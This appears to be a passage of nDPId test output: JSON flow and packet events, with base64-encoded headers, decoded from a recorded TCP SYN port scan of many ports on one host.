-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsv\/MAADkGT3+sEAAIQA2GNIzSFqndUoMYAAAAAGACCAAZ5gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsI4UAADEG8+2sEAAIQA2GNIzSDPrdUoMYAAAAAGACCAAjlQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060558,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_packet_id":1,"flow_last_seen":1278275060558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060558,"pkt":"ACYLMQczACWzv5HuCABFAAAsrqQAADcGYs6sEAAIQA2GNIzSB+XdUoMYAAAAAGACEAAgqgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060559,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_packet_id":1,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060559,"pkt":"ACYLMQczACWzv5HuCABFAAAsFrkAADkG+LmsEAAIQA2GNIzSDQXdUoMYAAAAAGACCAAjigAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAswpEAADIGU+GsEAAIQA2GNIzTB87dU4MZAAAAAGACDAAkvgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeIAAC8G65CsEAAIQA2GNIzTAaDdU4MZAAAAAGACEAAm7AAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsffkAACoGoHmsEAAIQA2GNIzTlZTdU4MZAAAAAGACDACW9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1391,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFAAADUGSyKsEAAIQA2GNIzSF9TdUoMYAAAAAGACCAAYuwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1392,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsH38AADoG7vOsEAAIQA2GNIzSAtDdUoMYAAAAAGACDAApvwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1383,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsR7gAAC0G07qsEAAIQA2GNIzSH1\/dUoMYAAAAAGACCAARMAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1394,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsglEAADIGlCGsEAAIQA2GNIzSAJLdUoMYAAAAAGACDAAr\/QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsHb4AADcG87SsEAAIQA2GNIzSAZfdUoMYAAAAAGACEAAm+AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060591,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_packet_id":1,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060591,"pkt":"ACYLMQczACWzv5HuCABFAAAsyacAADgGRsusEAAIQA2GNIzSDPvdUoMYAAAAAGACBAAnlAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1387,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADcGv+WsEAAIQA2GNIzSYODdUoMYAAAAAGACEADHrgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1388,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsEx8AADUGAFSsEAAIQA2GNIzSHz\/dUoMYAAAAAGACCAARUAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsi8gAACsGkaqsEAAIQA2GNIzSS5bdUoMYAAAAAGACEADc+AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv2QAACUGZA6sEAAIQA2GNIzS8czdUoMYAAAAAGACCAA+wgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1401,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsnmIAADoGcBCsEAAIQA2GNIzSAlHdUoMYAAAAAGACDAAqPgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAs8qkAAC8GJsmsEAAIQA2GNIzSF3LdUoMYAAAAAGACEAARHQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1403,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0kAACYGYymsEAAIQA2GNIzSBR7dUoMYAAAAAGACDAAncQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsRIMAACsG2O+sEAAIQA2GNIzSH0jdUoMYAAAAAGACEAAJRwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060592,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_packet_id":1,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060592,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2UAACwGmQ2sEAAIQA2GNIzSBFrdUoMYAAAAAGACBAAwNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1396,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsvfoAADoGUHisEAAIQA2GNIzTBC3dU4MZAAAAAGACDAAoXwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVvEAADUGvIGsEAAIQA2GNIzTDx3dU4MZAAAAAGACCAAhbwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 